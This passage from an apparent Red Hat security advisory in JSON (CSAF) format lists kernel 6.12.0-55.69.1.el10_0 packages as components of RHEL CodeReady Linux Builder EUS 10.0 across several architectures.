"product_id": "CRB-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
